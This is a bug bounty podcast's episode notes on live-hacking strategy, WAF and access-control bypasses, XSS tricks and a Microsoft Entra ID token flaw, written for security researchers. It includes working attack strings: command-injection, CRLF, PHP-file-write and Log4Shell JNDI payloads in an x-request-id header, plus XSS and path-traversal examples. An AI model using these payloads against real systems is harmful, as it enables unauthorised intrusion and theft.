Critical Thinking - Bug Bounty Podcast
Posts
[HackerNotes Ep. 143]: New Cohost + Client-Side Gadgets, LHE Meta — Instant Global Admin in Entra!

[HackerNotes Ep. 143]: New Cohost + Client-Side Gadgets, LHE Meta — Instant Global Admin in Entra!

In this episode of CTBB podcast Justin brings Brandyn (gr3pme) back to announce him as our newest co-host. We chat about recent LHE experiences, and then break down some news.

Nin Jeeter
October 10, 2025

Hacker TLDR;

WAF Bypass via Internal Employees: Internal employees may not encounter the same WAF you are. Use blind SSRF to determine if requests are going through WAF by checking response codes.
Secondary Context Bugs: Use path traversal in secondary contexts to manipulate path parameter IDs. If cross-organization bugs aren't found, try within the same organization.
Revisiting X-Correlation Injection: Correlation headers like *-id can expand the attack surface of a target if they are interacting with various contexts within the application. Listen to Episode 86 if you missed it.
Revisiting Archive Alchemist: Specialized tools like Mathias Karlsson's Archive Alchemist for testing archive upload vulnerabilities (Zip Slips/Symlink Attacks/etc.) can land some nice crits. Listen to Episode 132 if you missed it.
New Gareth Heye's Drop: A technique to smuggle data via the URL using the attributes reference inside HTML tag event handlers: https://x.com/garethheyes/status/1972698006777401801
XSS without () and ;: JavaScript quirks allow you to execute code in some unintuitive ways. Learn why by checking out Huli's new blog post.

LHE Strategy

"Know Your Target": What would hurt and where would it hurt? And based on what scope is available, what I can do with that?
Don't Brain Dump: Sometimes you can use what you learned from previous bugs or use some of the information revealed via those bugs to inform other vulnerabilities. (In fact you should if you're looking to optimize your earnings, right?)
The Juice May Be Worth the Squeeze: Although aligning your strengths to the scope can be a winning strategy, a lot of other hackers are likely intimidated by the same things you are. If you can clearly envision impact, delving into uncomfortable territory (whether it be desktop applications, binaries, or mobile apps) may be worth the risk.
Volume or depth?: Should you spend your time trying to submit the most reports or take the gamble on finding the most impactful? Ultimately, it's up to what you want to achieve. However, a balanced approach is starting with volume to understand the target, then going deep after dupe window closes.

Justin's LHE Takeaways: Approved for Pod Disclosure

WAF Bypasses via Internal Members

Internal members may not route through the same WAF as external users as the internal DNS resolves directly to hosts. This can serve as a payload delivery mechanism if you are able to target internal members of the target organization. If you have a Blind SSRF, try to hit a public facing asset from within company. If it hits the server and doesn't return a 403 response, you'll be able to confirm the WAF bypass.

Secondary Context Access Control Bypasses via Path Traversal

If a unique identifier is taken from the URL path, sometimes the access controls are performed by a front-end service. Try to reconstruct the path that is received on the backend by using path traversal to replace an identifier you have access to with one you don't have access to (or one where you have lower permissions).

https://app.example.com/users/12345/../67890/profile

Dont Skip Blackbox Logical Deduction Day

Spend time theorizing what is occuring on the backend in blackbox scenarios.

Brandyn shouts out Frans Rosen's research into correlation headers as an exemplary case of this.

Slides from Frans Rosen's 2024 Midnight Sun CTF presentation on the topic: X-Correlation-Injections (or How to break server-side context)

Keep a look out for any mentions of headers that include -id such as x-request-id. Add them to requests to see if their values are reflected. If so, test for:

Context breaks with ASCII characters:

x-request-id: ' " % & > [ $

Path traversal/arbitrary file write:

x-request-id: .. / var/www/html/< ?=phpinfo()? >.php

Header injection:

x-request-id: 1%0d%0ax-account:456

Header injection (with Java - \u010d → \u000d):

x-request-id: 1%c4%8d%c4%8anew-header: f00

OS Command injection:

x-request-id: $(id)

Log4shell:

x-request-id: $ {jdni :rmi ://x${sys :java.version}.mydomain/a}

JSON Injection:

x-request-id: 1"}. "payload":{"account":"456","foo":"

In the News

"Babe wake up. Heyes dropped a new payload."

Gareth Heyes posted a payload that leverages the attributes[] reference to reassign attributes in HTML tags. This technique allows you to:

Reassign attributes on the current HTML element.
Use the URL reference to access the document URI inside event handlers.
Smuggle data from the URL hash into JavaScript execution.

<svg onload="attributes[0].value=id+URL+id,new onload" id=`>

<input onfocus="attributes[0].value=id+URL+id,new onfocus" id=` autofocus>

Payload: #${alert(1)}

https://portswigger-labs.net/xss/xss.php?x=%3Cinput%20onclick=attributes[0].value=id%2bid%20id%60%3E#${alert(1)} + 2 clicks

Huli's New Blog

Huli posted a new blog, Explaining XSS without parentheses and semi-colons that breaks down the how and why some of the more "exotic" XSS payload work.

Key points from the blog:

Commas can chain multiple expressions, returning the last one.
Replacing onerror with eval allows you to execute the error message as code.
Errors thrown will become part of the error message.
As long as you can turn the error message into valid code, you’ve succeeded.

Google's SafeContentFrame

Google posted a new blog, Beyond Sandbox Domains: Rendering Untrusted Web Content with SafeContentFrame, that covers how the SafeContentFrame TypeScript library provides a secure way to render untrusted content inside <iframe>s.

The Unstoppable "Mega-Crit"

Dirk-jan Mollema details an incredible Entra ID vulnerability he found in his post: One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens

Entra (rebranded Azure AD) is Microsoft's cloud identity service.
"Actor tokens" are special authentication JWTs that allow services to impersonate users with "god-like permissions".
They are not logged when used, can't be revoked for 24 hours, bypass conditional access policies, and leave no audit trails.
Since the Azure AD Graph API didn't properly validate which tenant the token came from, an attacker could modify the claim fields to craft impersonation tokens for any tenant worldwide, allowing them to impersonate any user in any Entra ID tenant.

FlareProx

Luke Turvey released FlareProx, an IP rotation tool that deploys Cloudflare Workers as HTTP proxies, meaning you can now use their global CDN infrastructure and IP space to make requests.

It supports all HTTP methods.
100k requests a day are free.

However, if you don't want to pay for other people's fuzzing sessions, ensure to shut it down.

Caido 101

Aituglo wrote a Caido 101: How To Master It guide to help you migrate from Burp Suite and provides an overview of Caido's features.

View the Get Started documentation section to learn how to install and setup Caido.
New accounts are automatically upgraded to the premium Individual subscription tier for a month for free.
If you are a student, you can get a whole year of the Individual subscription for free!
Keep up-to-date with Caido by viewing the App Roadmap.

In Closing

Justin considers one of the "North Stars" for the podcast is making sure that intermediate to advanced level hackers are getting a takeaway every single week that modifies their methodology that makes them be a better hacker.

If you're improving every week, we love it.

As always, keep hacking!